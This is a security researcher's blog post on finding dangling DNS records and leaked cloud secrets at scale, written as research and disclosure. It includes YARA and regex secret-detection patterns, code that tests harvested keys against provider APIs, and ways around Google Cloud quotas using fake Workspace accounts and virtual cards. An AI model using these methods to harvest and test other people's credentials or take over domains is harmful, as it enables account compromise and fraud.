Bill Demirkapi's Blog

Secrets and Shadows: Leveraging Big Data for Vulnerability Discovery at Scale

Bill Demirkapi — Fri, 27 Sep 2024 05:19:00 GMT

Disclaimer: This research was conducted strictly independent of my employer (excluded from scope). All opinions and views in this article are my own. When citing, please call me an Independent Security Researcher.

Modern technologies like the cloud have made rapidly developing scalable software more accessible than ever. What used to require thousands of dollars in investment is now accessible through a free trial. We've optimized infrastructure-as-a-service (IaaS) providers to reduce friction to entry, but what happens when security clashes with productivity? What risks have we introduced for the sake of convenience?

For the last three years, I've investigated how the insecure defaults built into cloud services have led to widespread & systemic weaknesses in tens of thousands of organizations, including some of the world's largest like Samsung, CrowdStrike, NVIDIA, HP, Google, Amazon, the NY Times, and more! I focused on two categories: dangling DNS records and hardcoded secrets. The former is well-traversed and will be an intuitive introduction to finding bugs using unconventional data sources. Work towards the latter, however, has often been limited in scope & diversity.

Fake Article Demonstration on a New York Times Domain

Unfortunately, both vulnerability classes run rampant in production cloud environments. Dangling DNS records occur when a website has a DNS record pointing at a cloud host that is no longer in control. This project applied a variant of historical approaches to discover 66,000+ unique top-level domains (TLDs) that still host dangling records. Leveraging a similar "big data" approach for hardcoded secrets revealed 15,000+ unique, verified secrets for various API services.

While we will review the findings later, the key idea is simple: cloud providers are not doing enough to protect customers against misconfigurations they incentivize. The customer creates these vulnerabilities, but how platforms are designed directly controls whether such issues can exist at all.

Instead of taking accountability and enforcing secure defaults, most providers expect that a few documentation warnings that most will never read will mitigate their liability. This research demonstrates how this is far from enough and the compounding risk of abuse with hardcoded secrets.

Background

Cloud computing lets you create infrastructure on demand, including servers, websites, storage, and so on. Under the hood, they're just an abstracted version of what many internet-facing businesses had to do a few decades ago. What makes it work are high margins and more importantly, the fact that everything is shared.

Cloud Environments & Network Identifiers

A cloud resource is dangling if it is deallocated from your environment while still referenced by a DNS record. For example, let's say I create an AWS EC2 instance and an A record, project1.example.com, pointing at its public IP. I use the subdomain for some projects and, a few months later, deallocate the EC2 instance while cleaning up old servers I'm not using.

Remember, you paid to borrow someone else's infrastructure. Once you're done, the IP address assigned to your EC2 instance simply goes back into the shared pool for use by any other customer. Since DNS records are not bound to their targets by default, unless you remember that project1.example.com needs to be deleted, the moment the public IP is released is the moment it is dangling. These DNS records are problematic because if an attacker can capture the IP you released, they can now host anything at project1.example.com.

A/AAAA records are not the only type at risk. A* records are relevant when your cloud resource is assigned a dedicated IP address. Not all managed cloud services involve a dedicated IP, however. For example, when using a managed storage service like AWS S3 or Google Cloud (GCP) Storage, you're assigned a dedicated hostname like example.s3.amazonaws.com. Under the hood, these hostnames point at IP addresses shared across many customers.

CNAME Subdomain Takeover Example

DNS record types like CNAME, which accept hostnames, can similarly become dangling if the hostname is released (e.g., you delete a bucket, allowing an attacker to recreate with same name). Unlike dedicated endpoints, it is easier to guard shared endpoints against attacks because the provider can prohibit the registration of a deallocated identifier. Reserving IP addresses, however, is far less feasible.

Why Care?

Why should you care about dangling DNS records? Unfortunately, if an attacker can control a trusted subdomain, there is a substantial risk of abuse:

Enables phishing, scams, and malware distribution.
Session Hijacking via Cross-Site Scripting (XSS)
If example.com does not restrict access to session cookies from subdomains, an attacker may be able to execute malicious JavaScript to impersonate a logged in user.
Context-specific impact, like…
Bypass trusted hostname checks in software (e.g., when downloading updates).
Abuse brand trust & reputation for misinformation.

According to RIPE's article, Dangling Resource Abuse on Cloud Platforms:

The main abuse (75%) of hijacked, dangling resources is to generate traffic to adversarial services. The attackers target domains with established reputation and exploit that reputation to increase the ranking of their malicious content by search engines and as a result to generate page impressions to the content they control. The content is mostly gambling and other adult content.
...
The other categories of abuse included malware distribution, cookie theft and fraudulent certificates. Overall, we find that the hacking groups successfully attacked domains in 31% of the Fortune 500 companies and 25.4% of the Global 500 companies, some over long periods of time.

Dangling DNS records are most commonly exploited en masse, but targeted attacks still exist. Fortunately, to achieve a high impact beyond trivial search engine optimization, an attacker would need to investigate your organization's relationship with the domain they've compromised. Unfortunately, while trivial abuse like search engine optimization matters less in isolated incidents, it becomes a major problem when scaled.

Cloud Environments & Authentication

Cloud environments, including any API service, are managed over the Internet. Even if you use dedicated resources where possible, you're still forced to manage them through a shared gateway. How do we secure this access?

Since the inception of cloud services, one of the most common methods of authentication is using a 16 to 256 character secret key. For example, until late 2022, the recommended authentication scheme for AWS programmatic access was an access and secret key pair.

[example]
aws_access_key_id = AKIAIBJGN829BTALSORQ
aws_secret_access_key = dGhlcmUgYXJlIGltcG9zdGVycyBhbW9uZyB1cw

While AWS today warns against long-lived secret keys, you still need them to issue short-lived session tokens when running outside of an AWS instance. Also, it's still the path of least resistance.

An alternative example is Google Cloud (GCP).

gcloud CLI credentials: Trigger interactive login in a website browser to authenticate. Credentials cannot be hardcoded into source.
Application Default Credentials: Look for cached credentials stored on disk, in environment variables, or an attached service account. Credentials cannot be hardcoded into source.
Impersonated Service Account: Authenticate using a JSON file with a private key & metadata for a service account. Technically, you can hardcode it in a string and load it manually, but the default is to load it from a file.
Metadata Server: API exposed to GCP instances. Allows you to request an access token if a service account is assigned to the resource. Credentials cannot be hardcoded into source.

While GCP also has API keys, these are only supported for benign services like Google Maps because they do not "identify a principal" (i.e., a user). The closest they have to a secret you can hardcode, like AWS access/secret keys, are service account JSON files.

{
  "type": "service_account",
  "project_id": "project-id-REDACTED",
  "private_key_id": "0dfREDACTED",
  "private_key": "-----BEGIN PRIVATE KEY-----\nMIIEvwREDACTED\n-----END PRIVATE KEY-----\n",
  "client_email": "REDACTED@project-id-REDACTED.iam.gserviceaccount.com",
  "client_id": "106REDACTED...",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://oauth2.googleapis.com/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/REDACTED%40project-id-REDACTED.iam.gserviceaccount.com",
  "universe_domain": "googleapis.com"
}

Unlike a short secret, Google embeds a full size RSA 2048 private key in PEM format. While you could still hardcode this, there is an important distinction in how GCP and AWS approached short-lived secrets. Google incorporated strong defaults in their design, not just in their documentation.

GCP service account keys are stored in a file by default. AWS access and secret keys were not designed to be used from a file.
GCP client libraries expect service account keys to be used from a file. AWS client libraries universally accept access and secret keys from a string.
It is more annoying to hardcode a 2,000+ character JSON blob than it is to hardcode a 20-character access and 40-character secret key.

We'll dissect these differences later, but the takeaway here is not that AWS is fundamentally less secure than GCP. AWS' path of least resistance being insecure only matters at scale. If you follow AWS recommendations, your security posture is likely close to that of a GCP service account. At scale, however, it is inevitable that some customers will follow where the incentives lead them. In AWS' case, that's hardcoding long-lived access and secret keys in production code. GCP's layered approach reduces this risk of human error by making it annoying to be insecure.

Why Care?

Unfortunately, hardcoded secrets can lead to far worse impact than dangling DNS records because, by default, they have little restriction on who can use them.

By their very nature, secrets are "secret" for a reason. They're designed to grant privileged access to cloud services like production servers, databases, and storage buckets. Cloud provider keys could let an attacker access and modify your infrastructure, potentially exposing sensitive user data. A leaked Slack token could let an attacker read all internal communication in your organization. While impact still varies on context, secrets are much easier to abuse and often lead to an immediate security impact. We'll further demonstrate what this looks like when we review findings.

Past Work

This blog is not intended to serve as a thorough literary analysis of all past work regarding dangling domains and hardcoded secrets, but let's review a few key highlights.

Dangling Domains

Dangling DNS records are a common problem discussed for at least a decade.

One of the first works pivotal to our understanding of the bug class was published in 2015 by Matt Bryant, Fishing the AWS IP Pool for Dangling Domains. This project explored dangling DNS records that point at a dedicated endpoint, like an AWS EC2 public IP (vs a hostname for a shared endpoint, like *.s3.amazonaws.com).

Bryant found that he could continuously allocate and release AWS elastic IPs to enumerate the shared customer pool. Why is this important? To exploit a dangling DNS record, an attacker needs to somehow control its target, e.g., the EC2 IP that was previously allocated/released by the victim. While enumerating these IPs, Bryant searched Bing using the ip: quantifier to see if any cached domains pointed at it. This effectively allowed Bryant to look for dangling DNS records without a specific target.

A few years later, AWS implemented a mitigation that restricts accounts to a small pool of IPs, instead of the entire shared address space. For example, if you allocate, free, and reallocate an elastic IP today, you'll notice that you'll keep getting the same IPs over and over again. This prevents enumeration of the AWS IP pool using standard elastic IP allocation. Google Cloud has a very similar mitigation to deter dangling record abuse, but they extend the "small account pool" to apply to any component that allocates an IP.

Besides dangling records that point at a generic cloud IP, more recent work into "hosting-based" records (e.g., CNAME to a hostname, aka "shared" endpoint) includes, DareShark: Detecting and Measuring Security Risks of Hosting-Based Dangling Domains.

Researchers from Tsinghua University used DNS databases to identify records that point at "service endpoints", like example.s3.amazonaws.com. Next, if the managed service is "vulnerable", they check whether the identifier is registered (i.e., does the example s3 bucket exist?). If it is not, and the managed service is "vulnerable", they can register the identifier under their attacker account and hijack the record! Whether a service is vulnerable varies. For example, some providers require proof of ownership (like a TXT record) or disallow registering identifiers that were previously held by another customer.

There are a lot of other projects against dangling DNS records we won't review for brevity. While the space is well traversed, there are some limitations of historical approaches. In general, past work usually runs into at least one of the following:

Use of a limited data source to identify what domains point at a given IP/hostname.
Focus is exclusively DNS records pointing at IPs (dedicated endpoints) OR hostnames (shared endpoints). Rare to see both at once.
Extremely limited work into defeating modern deterrents.
- For example, many dangling DNS records that point at a shared endpoint are not actually exploitable because of provider restrictions like proof of domain ownership.
- Some large providers have seen almost no research into exploiting records that point at a dedicated endpoint, like a generic IP address, due to mitigations like a small pool of IPs assigned to your account. For instance, work into Google Cloud has been limited to shared hostnames.

Later, we'll use dangling records as an example of how you can apply unconventional data sources to find vulnerabilities at scale. Additionally, as we'll soon see, I also attempted to avoid these common pitfalls. With that said, let's move on to hardcoded secrets!

Hardcoded Secrets

Unlike dangling DNS records, work into hardcoded secrets was a lot more limited than I expected. In general, research into this category falls into two camps:

Tools to search files and folders for secret patterns.
Projects that search public code uploaded to source control providers, like GitHub, for secret patterns.

There are dozens of trivial examples of the former including Gitleaks, Git-secrets, and TruffleHog. These tools listen for new Git commits, or are ran ad hoc against existing data, like the contents of a Git repository, S3 bucket, Docker image, and so on.

Nearly all secret scanning tools work by looking for a regex pattern for various secrets. For example, some providers include a unique identifier in their API keys that makes accurate identification trivial, e.g., long-term AWS user access keys start with AKIA. You can see this in the example regex patterns above, such as AKIA[0-9A-Z]{16}.

Moving on from self-managed tooling, some source control platforms, particularly GitHub, proactively scan for secrets in all public data/code. In fact, GitHub goes a step beyond identifying a potential secret by partnering with several large cloud providers to verify and revoke leaked secrets! This is pretty neat because it can prevent abuse before the customer can take action.

In general, all work into hardcoded secrets faces the same problem: it's against a data set limited in scope and diversity. Even GitHub's secret scanning work, one of the largest projects of its kind to date, only has visibility into a small fraction of leaked secrets. For example, most closed source applications will likely never encounter GitHub's scanning. Other tools like TruffleHog are better at accepting a diverse set of file formats, but lack a large, diverse source, of those files.

How can we do better?

Shifting Our Perspective

Traditional Discovery Mindset

When we consider the conventional approaches to vulnerability discovery, be it in software or websites, we tend to confine ourselves to a specific target or platform. In the case of software, we might reverse engineer an application's attack surfaces for untrusted input, aiming to trigger edge cases. For websites, we might enumerate a domain for related assets and seek out unpatched, less defended, or occasionally abandoned resources.

Common Dangling Domain Takeover Flow

To be fair, this thinking is an intuitive default. For example, when was the last time you read a blog about how to find privilege escalation vulnerabilities at scale? They exist, but unsurprisingly, the industry is biased towards vulnerability hunting individual targets (including me!). This is the result of simple incentives. It's way easier to hunt for vulnerabilities at a micro level, particularly complex types like software privilege escalation. Monetary incentives like bug bounty are also target oriented.

To be fair, automatically identifying software vulnerabilities is extremely challenging. What I've noticed with cloud vulnerabilities is that they're not only easier to comprehend, but they also tend to lead to a much larger impact. Why? Remember- in the cloud, everything is shared! I can remotely execute code in a software application? Cool, I can now pop a single victim if I meet a laundry list of other requirements like network access or user interaction. I can execute code in a cloud provider? Chances are, the bug impacts more than one customer.

Should Some Vulnerabilities Be Approached Differently?

The industry lacks focus on finding bugs at scale- it's a common pattern across most security research. Can we shift our perspective away from a specific target?

Perspective	Dangling Resources
Traditional	Start with a target and capture vulnerable assets.
At Scale	Capture first & identify impact with “big data”.

With dangling DNS records, the "traditional" approach is to enumerate a target for subdomains and only then identify vulnerable records. Fortunately, dangling DNS records are one of the few vulnerability classes we've been able to identify at scale.

For example, we previously discussed Matt Bryant's blog about finding records that point at deallocated AWS IPs. Instead of starting with a target, Bryant enumerates potential vulnerabilities- the shared pool of available AWS IPs, many of which were likely assigned to a another customer at some point. Bryant worked backwards. What DNS records point at the IP I allocated in my AWS environment? If any exist, I know for a fact that they are dangling, because I control the target!

Bryant's methodology had other problems, like a limited source of DNS data (e.g., Bing's ip: search filter), but the key takeaways are simple.

Many vulnerability classes are trivial to identify, but are subject to our unconscious bias to start with a specific target.
There is a large gap in using non-traditional data sources to identify these issues at scale.

For example, the two perspectives for leaked secrets include:

Perspective	Leaked Secrets
Traditional	Scan a limited scope for secret patterns.
At Scale	Find diverse “big data” sources with no target restriction.

Today, most work towards identifying leaked cloud credentials focus on individual targets, or lack diversity (e.g., GitHub secret scanning). To identify dangling DNS vulnerabilities at scale, we start with the records, not a target. We do this by using "big data" sources of DNS intelligence, e.g., the capability to figure out what records point at an IP.

Are there similar "big data" sources that would let us identify leaked secrets at scale without starting with a limited scope?

The Security at Scale Mindset

Start with the vulnerability, not the target.
Work backwards using creative data sources.
Must contain relationships indicative of the targeted vulnerability class.
Must be feasible to search this data at scale.

Reverse the Process: Dangling Resources

A DNS record is dangling if it points at a deallocated resource. The ideal data source must include a large volume of DNS records. While we covered Bing as an example, are there better alternatives?

Passive DNS replication data is a fascinating DNS metadata source I learned about a few years ago. Long story short, some DNS providers sell anonymized DNS data to threat intelligence services who then resell it to people like me. Anonymization means they usually don't include user identifiers (client IP) and rather the DNS records themselves.

Passive DNS data has many uses. Most importantly, its diversity and scope is almost always better than alternatives to enumeration, like brute-forcing subdomains. If someone has resolved the DNS record, chances are that the record's metadata is available through passive DNS data. For our purposes, we can use it to find records that point at an IP or hostname we've captured while enumerating a provider's shared pool of network identifiers.

To be clear, using passive DNS data to find dangling records is not novel, but it's a great example of the security at scale mindset in practice. We will apply this technique against modern deterrents in the implementation section.

Reverse the Process: Secret Scanning

Going back to the drawing board- what unorthodox data sources would potentially contain leaked secrets? Well, secrets can be included in all sorts of files. For example, if you use a secret in your client-side application, it's not just your source code that has it- any compiled version will include it too. Websites, particularly JavaScript, can use secrets to access cloud services too.

Where can we find a large collection of applications, scripts, websites, and other artifacts?

What about… virus scanning platforms? "By submitting data ... you are agreeing ... to the sharing of your Sample submission with the security community ..."

Virus scanning websites like VirusTotal allow you to upload & inspect a file for malicious content using dozens of anti-virus software providers. The reason they caught my eye was because they have everything. Documents, desktop software, iOS and Android apps, text files, configuration files, etc. all frequently find their way to them. The best part? These websites often allow privileged access to these files to improve detection products, reduce false positives, and identify malware.

While we aren't after malware, we are after vulnerabilities. Virus scanning platforms are simply a means of identifying them. For example, platforms could block my access, but if a secret in some app was uploaded in a file to them, chances are that app is accessible off platform too.

Scanning Samples?

Even if we have a candidate data source, we're far from finished. It would be infeasible to scan every file on larger platforms directly. We need to reduce scope.

This challenge is not exclusive to our use case. If we were looking for malware, we'd run into the same feasibility problem. Fortunately, platforms that allow data access typically also provide a means of searching that data. In VirusTotal's case, this feature is called Retrohunt.

Retrohunt lets you scan files using something called "YARA rules". YARA provides a "rules-based approach to create descriptions of malware families based on regular expression, textual or binary patterns". The above example from YARA's documentation shows what these rules look like.

In the past work section, we discussed how secrets can sometimes have an identifiable pattern, like AKIA for AWS access keys. In fact, all secret scanning tools use regex based on these identifiers to find secrets. You know what else supports regex? YARA! While originally designed to "identify and classify malware samples", we can repurpose it to reduce petabytes of data to "just" a few million files that potentially contain credentials.

Enough theory, let's write some code!

Technical Implementation

Secret Scanning

Overview

The plan should be simple. Scan for secret patterns across several virus scanning platforms and validate potential credentials with the provider. How hard can it be? (tm)

One problem I encountered early on was that not all cloud providers use an identifiable pattern in their secrets. How are we supposed to identify candidate samples for scanning? In the overview of the security at scale mindset, note how I said the data source, "must contain relationships indicative of the targeted vulnerability class".

Just because we can't identify some secrets directly, doesn't mean we can't identify potential files indirectly. For example, let's say I have a Python script that makes a GET request to some API endpoint using a generic [a-zA-Z0-9]{32} key with no identifying marks. How would I identify this file for scanning? One relationship in the file is between the API key and the API endpoint.

While I can't search for the API key, what if I searched for the endpoint instead? The example above is a rule I wrote for Linode, a cloud provider with generic secret keys. I can't process every sample uploaded to VirusTotal, but chances are I can feasibly process every sample with the string api.linode.com.

Generic keys are also annoying because even if we cut our scope, 32 consecutive alphanumerical characters can easily match plenty of non-secret strings too. In this project, beyond identifying potential secrets, I wanted accurate identification. How do we know if a generic match is a secret? Only one way to find out- give it a go!

It would obviously be inappropriate to query customer data, but what about metadata? For example, many APIs will have benign endpoints to retrieve basic metadata like your username. We can use these authenticated endpoints as a bare minimum validity test to meet our technical requirements without going further than we have to! These keys are already publicly leaked after all.

To review:

We write YARA rules for cloud services we're interested in finding secrets for based on 1) any identifiable patterns in the secret, or 2), worst case we look for the API endpoint instead.
We search virus scanning platforms for these rules to identify a subset of samples with potential credential material.
We enumerate matches in each sample, and test potential keys against a benign metadata endpoint to identify legitimate finds.

Scanning Millions of Files

Our Retrohunt jobs will produce a large number of samples that may contain secrets. Extracting strings and validating every possible key will take time and computational resources. It would be incredibly inefficient to scan hundreds of thousands of samples synchronously. How do we build infrastructure to support our large volume?

When I first started this work in 2021, I started by scanning samples locally. It turned out to be incredibly impractical. I needed approach that could maximize the number of samples we could scan in parallel without breaking the bank. What if we leveraged cloud computing?

Cost Benefit Analysis of Serverless Computing by Cloudflare

A cloud execution model that has been growing in the past decade is serverless computing. At a high level, serverless computing is where your applications are only allocated and running when they are needed on a cloud provider's managed infrastructure. You don't need to worry about setting up your own server or pay for idle time. For example, you could run a web server where you only pay for the time it takes your application to respond to a request.

AWS's serverless offering is called AWS Lambda. What if we created an AWS Lambda function that scans a given sample for secrets? AWS Lambda has a default concurrency limit of 1,000. This means we could scan at least 1,000 samples concurrently! As long as our scans did not take more than a few minutes, AWS Lambda is fairly cost efficient as well. I ended up using AWS Lambda, but you don't have to! Most providers have equivalents; AWS was just where I had the most experience.

We need four major components for our secret scanning project.

We need a single server responsible for coordinating VirusTotal scans and dispatching samples to our serverless environment. Let's call this the coordinator.
We need an AWS Lambda function that can scan a sample for valid secrets in a few minutes.
We need a message broker that will contain a queue of pending Retrohunt jobs and a queue of validated secrets.
We need a database to store Retrohunt scan metadata, samples we've scanned, and any keys we find.

Our coordinator and Lambda function will require details for each type of service we are targeting.

The coordinator will need a YARA rule for each key type.
The Lambda function will need a method for determining if a string contains a potential key for that service and a method for validating a potential key with the backend API.

When I originally started this project, tools like TruffleHog which similarly detect and validate potential keys had not yet been created. More importantly, they weren't designed to maximize efficient scanning. With Serverless, you are charged for every second of execution. We needed an optimized solution.

For the Coordinator, I went with Python, but for the scanner, I went with C++. This component will download a given sample into memory, extract any ASCII or Unicode strings, and then scan these strings for secrets. For each supported provider, I implemented a class with two functions: 1) check if a string contains a potential secret key, and 2), validate a secret using a benign metadata endpoint (usually via REST). Generically, the scanner runs an internal version of strings and passes each to the first function. Any matches are tracked and asynchronously verified using the second.

std::vector LinodeKeyType::FindKeys(std::string String)
{
    const std::regex linodeApiKeyRegex("(?:[^a-fA-F0-9]|^)([a-fA-F0-9]{64})(?:[^a-fA-F0-9]|$)");
    std::sregex_iterator rend;
    std::vector potentialKeys;
    std::smatch currentMatch;

    //
    // Find all API keys.
    //
    for (std::sregex_iterator i(String.begin(), String.end(), linodeApiKeyRegex); i != rend; ++i)
    {
        currentMatch = *i;
        if (currentMatch.size() > 1 && currentMatch[1].matched)
        {
            potentialKeys.push_back(KeyMatch(currentMatch[1].str(), LinodeKeyCategory::LinodeApiKey));
        }
    }

    return potentialKeys;
}

bool LinodeKeyType::ValidateKeyPair(std::vector KeyPair)
{
    KeyMatch apiKey;

    //
    // Retrieve the API key from the key pair.
    //
    apiKey = KeyPair[0];

    //
    // Attempt to retrieve the account's details using the API key.
    //
    HttpResponse accountResponse = WebHelper::Get("https://api.linode.com/v4/account", {}, {{"Authorization", "Bearer " + apiKey.GetKey()}});
    if (accountResponse.GetStatusCode() == 200)
    {
        return true;
    }
    
    return false;
}

To detect secrets, I use hyperscan, Intel's "high-performance regular expression matching library". I originally started with C++'s implementation seen above, but I was shocked to find that hyperscan was faster by an order of magnitude. What took 300 seconds (e.g., scanning a large app with many strings) now took 10! Regex patterns were manually crafted based largely on public references, like that secret pattern repository we covered in Past Work.

The Coordinator, used to manage our entire architecture, was pretty straightforward. Triggered on a timer, it looks in a database for Retrohunt scans that are pending and monitors their completion. A cool trick: VirusTotal Retrohunt has a 10,000 sample limit per job. To avoid this, around ~5% into the job, you can check whether the number of matches times 20 (for 5%) is greater than or equal to 10,000. If it is, you can abort the job and dispatch two new Retrohunt jobs split by time. For example, if I'm scanning the past year, I'll instead create two jobs to scan the first and second half of the year respectively. You can recursively keep splitting jobs, which was critical for secrets which lacked an identifiable pattern and thus led to many samples.

# Check if our scan reached VirusTotal's match limit.
if (scan_status == "finished" and scan.get_num_matched_samples() == 10000) or \
		(scan_status == "running" and scan.is_scan_stalled()):
	logging.warning(f"Retrohunt scan {scan_id} reached match limit. Splitting and re-queueing.")

	# Calculate the mid point date for the scan.
	scan_start_time = scan.start_time
	scan_end_time = scan.end_time
	scan_mid_time = scan_start_time + (scan_end_time - scan_start_time) / 2

	# Queue the first half scan (start to mid).
	self.add_retrohunt_scan(scan.key_type_name, scan_start_time, scan_mid_time)

	# Queue the second half scan (mid to end).
	self.add_retrohunt_scan(scan.key_type_name, scan_mid_time, scan_end_time)

	logging.info(f"Queued two new retrohunt scans for key type {scan.key_type_name}.")

	# If the scan is running, abort it.
	if scan_status == "running":
		scan.abort_scan()
		logging.info(f"Aborted running scan {scan_id} due to stall.")

	logging.info(f"Marking retrohunt scan {scan_id} as aborted.")
	self.db.add_aborted_scan(scan_id)

The message broker and database are nothing special. I started with RabbitMQ for the former, but use AWS SQS today. I use MySQL for the latter.

To recap our end-to-end workflow:

The coordinator occasionally checks the database for new Retrohunt scan entries.
The coordinator keeps track of any pending Retrohunt scans.
- Early in a scan, if we predict that the number of samples exceeds 10,000, we split the scan in two.
- Once finished, we enumerate each sample and adds it to our message broker, in turn triggering an AWS Lambda call.
The AWS Lambda scanner downloads the sample and extracts ASCII/Unicode strings, calling the key type's FindKeys implementation.
Once finished, each potential match is validated using ValidateKeyPair in parallel.
Verified keys are added to the database.

This approach let me scan several million samples quickly and with a reasonable cost. While there are many optimizations I could do to the C++ scanner, or infrastructure by avoiding Serverless, it does not matter enough to warrant dealing with that complexity.

Dangling Domains

Moving on to dangling DNS records, I was most interested in challenging modern provider mitigations. Of note, as far as I could see, attempts to enumerate Google Cloud's pool of IPs has failed because of this. There has been work into hijacking dangling records for managed services, like Google Cloud DNS, just not the dedicated endpoint equivalent.

AWS also has a few mitigations, like the small pool of IPs you can access by allocating/releasing elastic IPs, but there are known ways around this. For example, instead of allocating elastic IPs, we can restart EC2 instances with ephemeral IPs to perform enumeration. On restart, you get a brand new IP.

Google Cloud was harder, but their mitigations are deterrents. Limitations include...

Like AWS, IPs are assigned from a small per-project pool. Unlike AWS, this applies project-wide. For example, trying to recreate compute instances will run into the same pool restriction (which is not true for AWS EC2).
Per project, by default, you can only have 8 IPs assigned at once, globally and per-region.
You can only have 5 projects associated with a "billing account".
Billing accounts are tied to a payment method like a credit card. You can only have 2 billing accounts per unique credit card (before hitting fraud verification).
You can only have 10-15 projects by default per account.

How do we get around these? Well...

You can attach a billing account across Google accounts.
To bypass account quotas, you can create multiple accounts using Google Workspace.
To bypass billing account restrictions, you can use virtual credit cards.

For most quota limits, I figured the easiest way around them would be to create several accounts. The billing restrictions made this difficult, but for account creation, I ended up creating a fake Google Workspace tenant. Google Workspace is just Google products as a service for enterprises. The neat part about a Workspace is that you can programmatically create fake employee accounts, each with 10-15 projects!

For the billing restrictions, I used virtual credit cards. Long story short, services like Privacy let you generate random credit card numbers with custom limits to avoid exposing your own. These services still follow know your customer (KYC) practices; my identity was verified, but they let us get past any vendor-set limits based on your credit card.

By creating several accounts using Google Workspace and unique virtual cards, I was able to get past Google's deterrents. Note that I didn't abuse any vulnerability- these mitigations simply are just mitigations. With the quotas out of the way, I successfully enumerated Google's public IP pools (per-region and global) by constantly recreating forwarding rules!

Key Findings

Metrics

Dangling Domains

CloudRot, what I called my dangling enumeration work, enumerated the public IP pools of Google Cloud and Amazon Web Services. In total, I've captured 1,770,495 IPs to date. 1,485,211 IPs (~84%) for AWS and 285,284 IPs (~16%) for GCP. The reason for the differences is largely due to Google's technical mitigations.

For every 1,000 IPs in AWS's public pool, 24.73 of them were associated with a domain. For every 1,000 IPs in Google Cloud's public pool, 35.52 of them were associated with a domain.

While purely speculative, I suspect that the noticeable increase in the rate of impacted Google Cloud's IPs is largely due to the fact that this is likely the first publication that has successfully enumerated the public IP pool for Google Cloud's "compute" instances at scale. There has been research into taking over managed applications in Google Cloud, but I was unable to find any publication that enumerated IPs, likely due to the extensive technical mitigations we encountered. Since there has been a lack of research into this IP pool, it's possible that the systemic vulnerability of dangling domains has gone unnoticed.

In total, I discovered over 78,000 dangling cloud resources corresponding to 66,000 unique top-level domains (excluding findings associated with dynamic DNS providers). There were thousands of notable impacted organizations like Google, Amazon, the New York Times, Harvard, MIT, Samsung, Qualys, Hewlett-Packard, etc. Based on the Tranco ranking of popular domains, CloudRot has discovered 5,434 unique dangling resources associated with a top 50,000 apex domain.

Here are a few archived examples!

The New York Times: https://web.archive.org/web/20230328201322/http://intl.prd.nytimes.com/index.html
Dior: https://web.archive.org/web/20230228194202/https://preprod-elk.dior.com/
State Government of California: https://web.archive.org/web/20230228162431/https://tableau.cdt.ca.gov/
U.S. District Court for the Western District of Texas: https://web.archive.org/web/20230226010822/https://txwd.uscourts.gov/
Even Chuck-e-Cheese! https://web.archive.org/web/20230228033155/https://qa.chuckecheese.com/

Hardcoded Secrets

Scanned over 5 million unique files from various platforms.
Discovered over 15 thousand validated secrets.
- 2,500+ OpenAI keys
- 2,400+ AWS keys
- 2,200+ GitHub keys
- 600+ Google Cloud Service Accounts
- 460+ Stripe live secrets
Breakdown of metadata
- ~36% of keys were embedded in the context of an Android application.
- ~12% of keys were embedded in an ELF executable, but these were often bundled in an Android app.
- ~8.7% of keys were found in HTML.
- ~7.9% of keys were embedded in a Windows Portable Executable.
- ~5.7% of keys were found in a regular text file.
- ~4.8% of keys were found in a JSON file.
- ~4.7% of keys were found in a dedicated JavaScript file.
- And so on...
Breakdown of country of origin
- ~3.7% of files with keys were uploaded from the United States
- ~2.3% from India
- ~1.7% from Russia
- ~1.4% from Brazil
- ~1.1% from Germany
- ~0.9% from Vietnam
- And so on...

Case Studies

Samsung Bixby

One of the first keys I encountered was for Samsung Bixby's Slack environment.

Long story short, the com.samsung.android.bixby.agent app has a "logcat" mechanism to upload the agent's log file to a dedicated Slack channel. It does this using the Slack REST API and a bot token for dumpstater.

The vulnerability was that the bot had a default bot scope, which an attacker could abuse to read from or write to every channel in Samsung's Slack!

CrowdStrike

Another early example includes CrowdStrike! An old version of a free utility CrowdStrike distributes on crowdstrike.com, CrowdInspect, contained an hardcoded API key for the VirusTotal service. The API key granted full access to both the VirusTotal account of CrowdStrike employee and the broader CrowdStrike organization inside of VirusTotal.

An attacker can use this API key to leak information about ongoing CrowdStrike investigations and to gain significant premium access to VirusTotal, such as the ability to download samples, access to VirusTotal's intelligence hunting service, access to VirusTotal's private API, etc. For a full list of privileges, you can use the user API endpoint.

As an example of how this key could be abused to gain confidential information about ongoing CrowdStrike investigations, I queried the VirusTotal Graphs API with the filter group:crowdstrike. VirusTotal offers Graphs as a feature which allows defenders to graph out relationships between files, links, and other entities in one place. For example, a defender could use VirusTotal graphs to document the different binaries seen from a specific APT group, including the C2 servers those binaries connect to. Since our API key has full access to the CrowdStrike organization, we can query the active graphs defenders are working on and even see the content of these graphs.

Obviously, this was quickly reported and got fixed in under 24 hours!

Supreme Court of Nebraska

This was a fun one. At the end of 2022, I found an interesting CSV export of an employee of Nebraska's Supreme Court with over 300 unique credentials including...

Credentials for internal infrastructure
Credentials for security tooling
Credentials for mobile device management
Credentials for VPN access (OpenVPN)
Credentials for cloud infrastructure
Unredacted credit card information
And much more...

These were seriously the keys to the kingdom and then some. While metadata showed the file was uploaded in Lincoln, Nebraska, by a web user, it's unclear whether this was an accident or an automated tool. I worked directly with Nebraska's State Information Security Officer to promptly rotate these credentials.

Beyond Vulnerability Discovery

An important goal I have with any research project is to approach problems holistically. For example, I not only like finding vulnerabilities, but thinking about how to address them too. Leaked secrets are a major problem- they are far easier to abuse than dangling DNS records. Was there anything I could do to mitigate abuse?

Piggybacking GitHub

I wasn't the only one trying to fix leaked secrets. GitHub's secret scanning program had already addressed this. GitHub partners with many cloud providers to implement automatic revocations. Partners provide regex patterns for their secrets and an endpoint to validate/report keys. For example, if you accidentally leak your Slack token in a GitHub commit, it will be revoked in minutes. This automation is critical because otherwise, attackers could search GitHub (or VirusTotal) for credentials and abuse them before the customer has an opportunity to react.

I asked whether they could provide an endpoint for reporting keys directly. GitHub had done a great job creating relationships with vendors to automatically rotate keys. After all, I could already report a key by just posting it on GitHub, and all hosting an endpoint would do is help secure the Internet.

Unfortunately, they said no. Fortunately, I was only asking as a courtesy. I created a throwaway account and system that would use GitHub's Gist API to create a public note with a secret for only a split second. In theory, this would trigger GitHub's scans, and in turn a provider revocation.

This actually worked during testing, but I ran into the above error when trying it with ~500 keys.

It turns out GitHub doesn't like it when you create hundreds of Gists in a matter of minutes and suspended my account. This was a problem due to the scale of keys I was finding. Unfortunately, once a test account is flagged, most API calls fail. How can we get around this?

